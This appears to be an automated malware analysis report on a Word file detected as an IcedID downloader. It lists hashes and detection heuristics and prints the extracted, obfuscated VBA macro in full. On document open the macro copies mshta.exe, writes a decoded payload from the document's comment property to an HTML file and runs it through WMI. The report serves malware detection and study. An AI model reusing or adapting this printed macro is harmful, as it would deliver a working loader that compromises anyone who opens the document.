Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 1182327c91603f7e…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 79.3 KB
Created: 2020-12-01 11:02:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-12-25
MD5: e276a418c09394ddbaf7c937c9b4ea60
SHA-1: 947509347ff99f8e7d01bb5c1b9b8350c636120d
SHA-256: 1182327c91603f7ea8f556b0d5f4ef08058fe6357605682afb13f3b64d69757e
Risk score: 170

Heuristics (6)

  • ClamAV: Doc.Downloader.IcedID-87f88705f807f878-9951567-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.IcedID-87f88705f807f878-9951567-0
  • VBA project inside OOXML [medium, 3 related findings] OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script:
    CreateObject(awY6r).create (aWjxv)
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched line in script:
    Sub AutoOpen()
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 13623 bytes
SHA-256: 7a75f5b939272a657a34eea1f355c69489e8e40ab6d93303fcd660c9a2133d27
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "a7T4uP"
Function ati159(afijMF)
' Disorganized sonya deep
aHc0j = afijMF
aB6lx9 = Len(aHc0j)
For at4UZ0 = 0 To aB6lx9 - 1
' Baboon steel diagonal
' Metamorphosis lanes legislature acclaim
' Unbidden spam
' Predicate aspen blues
' Skilled
' Semester funds karl add probabilities
' Dyspepsia fauna swing appears
' Presumptuous wholl features preoccupied sulphuric
' Insipid surmount horror
' Blizzard ri mess candidly illiberal
' Oem
' Mortgage mirthful suggesting highlight instigator encoding
' Generous reporting
' Oven create
' Marshall somehow cringe rp
' Bunk lovely
' Competitor replacing all-round elegy
' Mushroom dist afire virility invitation
' Impaled infatuation hydra
' Addiction auckland
' Incompatible john
' Wants
' Teamster revealed artwork matches love-making
' Unholy textiles obtained
' Loudness humped
' Quartette clips
' Floral patio
' Prep unpacked
' Food cheats
' Pincers amphibious tar third
' Elfin
' Ot offshoot pc
' Float
aBVEGb = aBVEGb & Mid(aHc0j, (aB6lx9 - at4UZ0), 1)
Next at4UZ0
' Mar alkali chimera
' Dating glimmered calvary function
' Density anachronism peremptory
' Succor mop sword dolls
' Manor chic emaciated
' Fatherly stagnant kilt gable
' Usurper froze
' Coupons overdo rudiments
' Worst
' Scrip series
ati159 = aBVEGb
End Function
Public Function admq0V(axiKs)
admq0V = Replace(axiKs, aso8D, "")
End Function
Sub AutoOpen()
' Symmetry blink facing visit sharon
aGis3U
End Sub

Attribute VB_Name = "area1I"
Public Const aHVzE2 As String = "sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw"
Public Const aso8D As String = ")"
Public Const auQG07 As Integer = -2440 + 2453
Function apdSL6()
' Clinton inconsolable sphere
' Draws ind. unix forsworn lips
' Lighter fallacy
' Democrats potentate distribute baggy progressive earn
' Nasal forces arab
' Functional historically involving mosque
' Propulsion warehouse combining apulia
' Wriggle jvc fitness gretchen papua
' Sitemap abstained
' Architect poll distinction ic pty
' Freeze angola sticky episcopal intermission
' Trivia octagonal chem dent bloody burthen proboscis
End Function
Sub aG1tsp(a0qxmr)
' Accommodate connectivity hundredth
' Britannia
' Assets freeze us taxi
' Liege pedagogue
' Tiptoe exemplify
' Astronomer spurious injured
' Com- wanda willow
' Pave loads
' Said rhea exams substantially
' Aristocrat translate rats ccd languorous winds outer
' Doze substitute
' Lion cohen cables
' Hazardous requests susan
End Sub
Function adIae(aMfup)
' Fashion poland samaria burlesque coerce
adIae = ActiveDocument.BuiltInDocumentProperties(aMfup)
End Function
Public Sub aJGw3()
If 354 - 290 < 129 Then
Call aYoDX
End If
End Sub
Public Sub a6B0P()
' Broadcasting backgrounds pod
' Border
' Sucking approving measurements unbelievable
' Pet readings
' Furze utilization
' Eleven info
' Interpose enervated
' Nonprofit
' Blond metric unknown detraction guido
' Trademarks turnkey
' Adams psyche
If 354 - 290 < 129 Then
Call alQ8C
End If
End Sub

Attribute VB_Name = "aqxCk"
Public Function amB0qZ(acFCs, aNX9jY)
' Enhance bulgarian
' Grande beverly
' Practitioners ceiling appealingly triangle palmer removal
' Booth under feign
' Bankrupt brawl rg manhattan latinas
' Ailed placing
' Dastardly trapping follower woodlands meetings
' Jewel return injection
' Instantly ova incompetent
' Wilkinson terrorism
' Stew artifice wa influx
' Ripen
' Winded
' Dont demise
' Fend greenwich sepulchre
' Disastrously
' Logos packard vitamin instantaneously
' Increase hunt
' Funky ecuador
' Arrived ep mecca rotating gibraltar temperature
' Rubble posted scandinavia dimension variants enormous
' Legendary procures cookies
' Cracking superman blue-black vicissitude hans memento
' Hypocritical adopt bounteous chad
FileNumber = FreeFile
Open acFCs For Output As #FileNumber
' Downpour tag ointment truncheon
' Partaken upturned halloween backwoods
' Restrict sewing dealer
' Thorny control trousseau bog contributed
' Triple marbles throb sculpture facilitating hard-boiled
' Silk seam acidity claudia fraudulent keyboard
' Anterior ignition kathleen
' Biggest consecrate criticized
' Perverted tools shrewdly
' Bermuda
' Sense truck domains patches
' Ner artemis collapse flagship
Print #FileNumber, aNX9jY
Close #FileNumber
End Function
Sub aClJqU(aglIMk, aaAyRK)
' Abduction implementing abnegation fairy hamilton thieving
' Yarn perception noose
' Providence
' Hives undesirable intuitive aura
' Tenaciously arabic
' Steam gen
' Loon scanner accumulates handjobs
' Crate guidelines mesa engineers
' Accessory conscripts
' Mayor
' Deaths handhelds
' Plaintiff insufferable amazon thirty-one
' Vomiting mit
' Spruce fahrenheit mexico
' Observable lattice del fi
' Grave
' Palette dts jets dissimilar
' Tutorial
' Solo fauna
' Rend southeast easier dealt
' Mead imposed pegasus slighting
' Tablespoon greece textbooks financial raspberry
' Shopping obsequious voltaic
FileCopy aglIMk, aaAyRK
End Sub
Function abH61(aVUmen)
' Mom retribution treatment
' Technician embedded corks
' Antivirus abstractedly plumage thumping
' Clipped giants
' Naked jpg twenty-seven
' Titled Word products
' Puts substitute undoing sponsor expiate
' Alien assignments bye
' Lazarus
' Mono ethnic omniscient shows
abH61 = aVUmen
End Function

Attribute VB_Name = "aHJ6up"
Sub aGis3U()
' Catalogs elemental where
' Sis no subjunctive inexpensive heritage
' Lurked signup
' Hearsay exasperate
' Amongst knee-deep
' Calgary swoon
' 411 beam bush champions
' Lighthouse culinary therapeutic
' Procreation scientific noted alienation mat
' Stealthy burgher parry immune
aJGw3
' Ruts muscles precipitated contemn trip edwards pierce
' Characterization buf beneath
' Captious compact white
' Sulkily carboniferous turned baffle
' Waft
' Declaration failures whosoever playlist clean immutable
' Container materials promises
' Thrive draper altering
' Problems cups
' Curve erp europe tune
' Weblogs philosophy extensions
' Distraction obituaries
a6B0P
' Slough simplified emily
' Anger ar caucasian
' Tamper sarah maintaining generate storey
' Washington jude terrace weapon reconstruct
' Person overbearing footwear
' Ks withering previews antidote keith active
' Talmud debtor narcissus
' Edict
' Such ugly morale anything sg
' Minx circlet
' Eight inanimate
' Categories nudist winters
' Aberrations abstract
' Realize
' Linda locomotion
' Hugh brocade diverge
' Subcommittee
' Expectations wagon pantheism
' Receive chevalier
' Southwest boatswain eighty-two
' Wherewithal heights tune eliminate
' Unblemished footfall where
' Downhill
' Electronic disembodied
' Persistent
' Nether ratification
' Credulous asian typewritten delete
' Unpremeditated unicameral cinder casual funnel bloodshot
' Trio immune dash
' Examines fence
' Concupiscence flat
' Sector reply shaved
' Amanda angelic
' Andover sessions sensuous small
' Dogma mace lige tendril conversion
' Frankfurt two mustang
' Static county contains
' Creativity blackbird clarity interior
' Betting galen tuft
' Tryst parameter arroyo zodiac compared
' Whitewash hopes halter
' Dancing interventions horror
' Shareware countries catering covert
' Gear blurred actions lustrous
' Thunderstorm crash pate untold
' Ufo packet
' Randy meteoric closure
' Stickers carinthia miocene
' Antiquated runner ft largesse
' Betide championship broadcast eyed value
' Creations atlanta
' Worn-out calculation burlington detest dies
' Crane buoyancy advertisement
' Stay granted arena vision
' Evil sociology library morass
awY6r = admq0V(ati159(aHVzE2))
' Willow scores sleeping
CreateObject(awY6r).create (aWjxv)
End Sub

Attribute VB_Name = "awAdY3"
Function aBt82()
aBt82 = VBA.Split(ati159("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)|)o)t)o)m) )o)l)l)e)h)"), "|")
End Function
Function aoiuE(axuFCO)
aHoY8 = aBt82()
' Botany robert
' Discourage keel adjournment lived surrey purblind
' Hardcover
' Mortgages
' Inhospitable
' Warranties limitation profusely functioning
' Workshop mv
' Mislaid
' Flooring consensus potter harold
' Logs guatemala
' Briefs garish guaranteed
' Villainous surmount finances
' Paxil seating freak penitentiary
Select Case axuFCO
' Foundations
' Nave treated trend
' Pmid epidermis accrued
' Destroy uncompromising earshot measurement drum
' Presbytery problematical anachronism suggestions
' Refined null upc ra penmanship cravat breed
' Enable surge story
' Measurement emit gill refrigerator grain
' Joker persistent slav debility byte
' Uncompromising canna
' Coalition infirmity weapon
Case 0:
aoiuE = aHoY8(1)
' Gruesome
Case 1:
' Antarctic intolerant
' Selecting footnote weapon
' Dale jobs prescribed hrs
' Blogging blonde suggestions stuttgart
' Terminating claire siddhartha
' Evoke alex huntington identified
' Undercurrent misuse solely
' Horny antigua treating
' Scabbard nazarene
' Comfort scudding dissolute
' Finest dogma believe
aoiuE = aHoY8(2)
Case 2:
aoiuE = aHoY8(3)
End Select
End Function
Sub alQ8C()
aJscX = a7PjYe(aoiuE(2))
amB0qZ aJscX, anD3Wb(adIae("comments"))
End Sub

Attribute VB_Name = "a9No0"
Function aMuJH(al23a)
' Aeschylus imagery madder
' Celebrity spike
' Cram gauntlet endearment locusts oneness
' Bidding poems measures
' Tick recurrence
' Broadsword stoical amorphous suggestions jess
' Styles indicated momentarily assessed airlines
' Synod cia
' Acumen matters
' Una shelf bradley
' Happen donald unitarian melbourne hoped
aMuJH = admq0V(al23a)
End Function
Function awrPp(alBUu)
' Tables structures num
awrPp = (admq0V(alBUu))
End Function
Function a7PjYe(axO9p)
' Cornfield leo
' Eligibility overnight marshy
' Dairy dependence jetty
' Secede heinous
' Soot thankfulness twos profitless
' Newcastle supervisor acts
' Levee s bloodshot sold pertinent
' Kidney accomplishes portsmouth godmother
' Rentals types janet fewest singularity ovum
' Spaces relation pda
' Olympic wills scold
a7PjYe = (admq0V(axO9p))
End Function
Function aWjxv()
acOfFG = awrPp(aoiuE(1))
acSO8 = a7PjYe(aoiuE(2))
aWjxv = acOfFG & " " & acSO8
End Function
Sub aYoDX()
a3BVft = aMuJH(aoiuE(0))
acOfFG = awrPp(aoiuE(1))
aClJqU a3BVft, acOfFG
End Sub
Function aYj8w(a0G1K)
aYj8w = a0G1K + 30394 / 1169
End Function
Function arCWmU(aG98oQ)
If aG98oQ = 0 Then
arCWmU = -16021 + 16022
' Href librarian tex session
' Handjob sapphire
' Tide jeweler disconcerting proposition
' Walt posting scythe pill ennui
' Baseness communal evolve
' Bd pollution transparent hip
' Signing retains seaport
' Brothers asthma
' Adopt regardless distilled
' Puzzle ignore ion fire louisville
' Flickered boy
' Scarecrow samoa studies erotica harley
' Aggressor glassy rarity swift fifty-eight
' Trice
' Miles internationally freckled advertisements
' Ravenously confident translation hundredweight
' Incendiary longevity
' Endless matrimony
' Ell ipod scraggy ode
' Ave rancid
' Calabria ringleader perforated prop meets liver
' February sculpture
' Unknown structural inca
ElseIf aG98oQ = 5 Then
arCWmU = 26093 / 269
Else
arCWmU = 5120 / 5
End If
End Function
Function ax87U(a0G1K, aDtASk)
ax87U = a0G1K - aDtASk
End Function
Function aniW5(a0G1K)
aniW5 = Chr(a0G1K)
End Function

Attribute VB_Name = "aOqZSc"
Function anD3Wb(aA8po) As String
Dim aQLzd As Long
Dim a8BS3 As Integer
Dim aYNnt As Integer
For aQLzd = 1 To VBA.Len(aA8po) Step 1
aYNnt = 0
alvAfL = Mid(aA8po, aQLzd, 1)
' Requisition itch alerts lack pliable
a8BS3 = Asc(alvAfL)
' Offering stack jeweler
' Ventures kick
' Requests halter deal betaken
' Precipitately meed currently
' Kent commitment rectum
' Exploring fa inquiry
' Converted dt group
' Lancashire hurling j
' Shanty ltd longest
' Somehow nutriment regions
' Budget textiles empty amelioration capitol
' Surmised profligate curve pussy era grill sapling
' Shunned detrimental elope
' Tatiana inquisitor namibia ceres preference
If (a8BS3 > 64 And a8BS3 < 91) Or (a8BS3 > 96 And a8BS3 < 123) Then
aYNnt = auQG07
a8BS3 = ax87U(a8BS3, aYNnt)
' Astronomer ballot threadbare
' Experimentally dictator drainage dreamer
' Aquila nurse
' Bale turned avon ir experts
' Watching hemlock luster ostentatious pt. competition
' Sedate julian
' Dts georgie risky aboriginal
' Insidiously gibson bluish mae refectory three-cornered
' Thicken expanded passer-by gasoline
' Jt
' Quarters vertical susanna done
If a8BS3 < arCWmU(5) And a8BS3 > 83 Then
a8BS3 = aYj8w(a8BS3)
ElseIf a8BS3 < -260 + 325 Then
a8BS3 = aYj8w(a8BS3)
End If
End If
aTBUeX = aniW5(a8BS3)
' Sh fundraising tatters dray intelligent thane
Mid$(aA8po, aQLzd, 1) = abH61(aTBUeX)
Next
' Forensic nasdaq nm
' Namespace applies obituaries strew
' Accreditation downtown
' Sorcery cold-blooded toothache step
' Imagery ought string
' Spittle inaugurate syndication
' Better wield wheel gallic
' Submissions libertine uv
' Charles episode aunty reviews
' Fatherhood nurture menagerie
anD3Wb = aA8po
End Function

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 54784 bytes
SHA-256: a6ae4674ed4806c207f1468431bb9be4d5153fbefced29ab9290556a101e0232